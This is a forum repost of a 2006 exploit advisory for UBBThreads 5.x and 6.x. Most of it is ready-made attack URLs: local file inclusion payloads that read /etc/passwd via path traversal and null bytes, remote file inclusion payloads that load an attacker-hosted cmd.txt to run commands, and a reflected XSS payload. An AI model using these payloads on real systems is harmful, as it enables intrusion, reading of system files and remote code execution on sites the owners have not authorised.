MadBadSad Posted May 29, 2006 Report Posted May 29, 2006 UBBThreads 5.x,6.x Multiple File Inclusion VulnerabilitiesContacts > ICQ: 10072 MSN/Mail: nukedx@nukedx.com web: www.nukedx.comThis exploits works on UBBThreads 5.x,6.xOriginal advisory can be found at: http://www.nukedx.com/?viewdoc=40Succesful exploitation register_globals onVersion 6.xGET -> http://[site]/[ubbpath]/includepollresults.php?config[cookieprefix]=&w3t_language=[FILE]EXAMPLE -> http://[site]/[ubbpath]/includepollresults.php?config[cookieprefix]=&w3t_language=../../../../../etc/passwd%00GET -> http://[site]/[ubbpath]/ubbt.inc.php?GLOBALS[thispath]=[FILE]EXAMPLE -> http://[site]/[ubbpath]/ubbt.inc.php?GLOBALS[thispath]=http://yoursite.com/cmd.txt?EXAMPLE -> http://[site]/[ubbpath]/ubbt.inc.php?GLOBALS[thispath]=/etc/passwd%00If php version < 4.1.0 or UBB version <= 5.xGET -> http://[site]/[ubbpath]/ubbt.inc.php?thispath=[FILE]EXAMPLE -> http://[site]/[ubbpath]/ubbt.inc.php?thispath=http://yoursite.com/cmd.txt?EXAMPLE -> http://[site]/[ubbpath]/ubbt.inc.php?thispath=/etc/passwd%00XSS:GET -> http://[site]/[ubbpath]/index.php?debug=[XSS]EXAMPLE -> http://[site]/[ubbpath]/index.php?debug=<script>alert();</script># nukedx.com [2006-05-27]# milw0rm.com [2006-05-28] Quote